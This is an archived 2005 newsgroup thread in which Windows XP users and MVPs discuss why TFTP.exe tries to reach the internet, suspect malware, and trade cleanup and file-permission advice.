TFTP is Trying to Access Internet

[Prabhat]

Hi All,

I have Windows XP + SP1 with ZoneAlarm Latest Installed.

Sometime Zonealarm alert me about TFTP is trying to access Internet. When I
verified the Property of TFTP.exe I found that is Belongs to Microsoft and
found info from internet that that is a limited version of Microsoft FTP
client.

Why is that executable trying to access internet? Is that Indicated that
some Spyware exists in my PC? I have Scanned my PC using MS Antispyware BETA
but no spy found. (I have AVG Antivirus Installed)

Please Suggest.

Thanks
Prabhat

 

[Will Denny]

Hi

That file is related to TCP/IP. Have you had any problems with any web
sites if you deny Internet access?

 

[Daniel Crichton]

Will wrote on Tue, 5 Jul 2005 13:34:38 +0100:

Hi

That file is related to TCP/IP. Have you had any problems with any web
sites if you deny Internet access?

--

Will Denny
MS-MVP Windows Shell/User
Please reply to the News Groups

That file is the Trivial File Transfer Protocol program that comes with
Windows. It's only relation to TCP/IP is that it uses TCP/IP to connect to
TFTP servers.

Most likely there's malware on the machine trying to use it to download
files from a TFTP server. The only time I've ever seen it in use was on a
test web server I had running that suffered from a buffer overflow hack on
it's web server software (which incidentally wasn't IIS) and the TFTP
program was launched by the attack to download an executable which would
have opened a "backdoor" into the server (which would have been prevented by
the hardware firewall in place anyway), and after sending to NAI and
Kapersky it was determined that the TFTP connection had been interrupted so
the executable was incomplete, but enough of it was present for them to be
able to make an analysis and put out signatures. Never had this return
either as the web server software was fixed soon afterwards.

Dan

 

[David H. Lipman]

From: "Prabhat" <[email protected]>

| Hi All,
|
| I have Windows XP + SP1 with ZoneAlarm Latest Installed.
|
| Sometime Zonealarm alert me about TFTP is trying to access Internet. When I
| verified the Property of TFTP.exe I found that is Belongs to Microsoft and
| found info from internet that that is a limited version of Microsoft FTP
| client.
|
| Why is that executable trying to access internet? Is that Indicated that
| some Spyware exists in my PC? I have Scanned my PC using MS Antispyware BETA
| but no spy found. (I have AVG Antivirus Installed)
|
| Please Suggest.
|
| Thanks
| Prabhat
|

Dump the contents of the IE Temporary Internet Folder cache (TIF)
Start --> Settings --> Control Panel --> Internet Options --> Delete Files

Dump the contents of the Mozilla FireFox Cache { if you use FireFox }
Tools --> Options --> Privacy --> Cache --> Clear

Download MULTI_AV.EXE from the URL --
http://www.ik-cs.com/programs/virtools/Multi_AV.exe

It is a self-extracting ZIP file that contains the Kixtart Script Interpreter {
http://kixtart.org Kixtart is CareWare } three batch files, five Kixtart scripts, one Link
(.LNK) file, this PDF instruction file and two utilities; UNZIP.EXE and WGET.EXE. It will
simplify the process of using up to 3 different Anti Virus Command Line Scanners to remove
viruses and various other malware.

C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
This will bring up the initial menu of choices and should be executed in Normal Mode. This
way all the components can be downloaded from each AV vendor’s web site.
The choices are; Sophos, Trend, McAfee, Exit the menu and Reboot the PC.

You can choose to go to each menu item and just download the needed files or you can
download the files and perform a scan in Normal Mode. Once you have downloaded the files
needed for each scanner you want to use, you should reboot the PC into Safe Mode [F8 key
during boot] and re-run the menu again and choose which scanner you want to run in Safe
Mode. It is suggested to run the scanners in both Safe Mode and Normal Mode.

When the menu is displayed hitting 'H' or 'h' will bring up a more comprehensive PDF help
file.

To use this utility, perform the following...
Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
Choose; Unzip
Choose; Close

Execute; C:\AV-CLS\StartMenu.BAT
{ or Double-click on 'Start Menu' in C:\AV-CLS }

NOTE: You may have to disable your software FireWall or allow WGET.EXE and/or FTP.EXE to go
through your FireWall to allow them to download the needed AV vendor related files.

* * * Please report back your results * * *

 

[Prabhat]

That file is related to TCP/IP. Have you had any problems with any web

sites if you deny Internet access?

Hi, Every time it ask permission to connect to internet I deny. But I never
had any problem and later I set the rule in Zonealarm to deny every time.
But I just wanted to know If I have not requested then how it will connect
to any FTP server?

 

[Prabhat]

Hi David,

Thanks for the Info. I will use the script and verify the System. But I have
scan my system once using NAV 2005 But no result while recently I used AVG
(as currently I am using) and able to find one virus from my PC.

Thanks
Prabhat

 

[David H. Lipman]

From: "Prabhat" <[email protected]>

| Hi David,
|
| Thanks for the Info. I will use the script and verify the System. But I have
| scan my system once using NAV 2005 But no result while recently I used AVG
| (as currently I am using) and able to find one virus from my PC.
|
| Thanks
| Prabhat


There is no OS reason to use TFTP unless you are specifically doing it fot a resson succh as
using it in a BootP/TFTP process such as configuring network devices such as a Ethernet
switch, Router or print server. Therefore malware is presumed and is highly likely.

 

[George Hester]

tftp can be a security risk. If it is attempting to access the Internet
then yes I'd say you have a problem. You cannot remove that file for if you
do you will have System File errors. The file is necessary. If you want to
stop it from accessing the Internet remove all NTFS permissions from it and
I mean all. When you apply updates to Wuindows XP you may have to reenable
those permissions first by checking Allow permissions to propagate to it.
Then remove them when you are done. Don't worry if you forget Windows will
give you the option to fix the problem and you know what the problem is.

 

[Kelly]

The Windows firmware update program "tftp.exe", supplied by Linksys and UMAX
as part of their firmware update .exe files. More info on Security listed
here:
http://www.practicallynetworked.com/support/tftp_problem.htm

--

All the Best,
Kelly (MS-MVP)

Troubleshooting Windows XP
http://www.kellys-korner-xp.com

 

[David H. Lipman]

From: "Kelly" <[email protected]>

| The Windows firmware update program "tftp.exe", supplied by Linksys and UMAX
| as part of their firmware update .exe files. More info on Security listed
| here:
| http://www.practicallynetworked.com/support/tftp_problem.htm
|
| --
|
| All the Best,
| Kelly (MS-MVP)
| | Troubleshooting Windows XP

In reference to that URL, storing the Routers password as ClearText in the TFTP client is
hardly a problem if the following are set...

"Block WAN request" -- Enabled
"Remote Management" -- Disabled
"Remote Upgrade" -- Disabled.

However I truly doubt that the OPs problems has anything to do with the TFTP client that
comes with a Router's FirmWare and it is the TFTP client that is used in the OS that is
being used as indicated in the OPs problem.

And I disagree with George's assessment - "You cannot remove that file for if you do you
will have System File errors. The file is necessary". I know of no known reason that
TFTP.EXE would be used in the Windows OS in a kernel functionality. It is a mere client
utility like FTP.EXE and is used by the Windows PC user as needed.

 

[David Candy]

where is it connecting too.

 

[Prabhat Nath]

Hi David Thanks for the suggestion and settings.
Prabhat

 

[George Hester]

Dave all I ask you to do is try it. Remove the file if you want. Install a
Service Pack. It will reappear. Better yet leave it alone. Remove the
permissions from it it's almost the same thing but isn't.

 

[David H. Lipman]

From: "George Hester" <[email protected]>

| Dave all I ask you to do is try it. Remove the file if you want. Install a
| Service Pack. It will reappear. Better yet leave it alone. Remove the
| permissions from it it's almost the same thing but isn't.
|
| --
| George Hester

Well if I delete or rename it, it gets restored. Even w/o installing a SP.
BTW: I am on Win2K and this happens.

I renamed the native TFTP.EXE and dropped a Linksys Read-Only TFTP.EXE file and it was still
auto-replaced.

So if you assert "it is neccessary", then what is it used for ?

 

[George Hester]

I don't know and I agree having it at all is a security risk. It is a
System Protected file. sfc will gripe if it is not there and if all
permissions are removed on it. But really just leave it where it is.
Remove the permissions and you almost have it "not there." It avoids sfc
issues. It's easy to put it back in by allowing permissions to propagate to
it. That's my suggestion.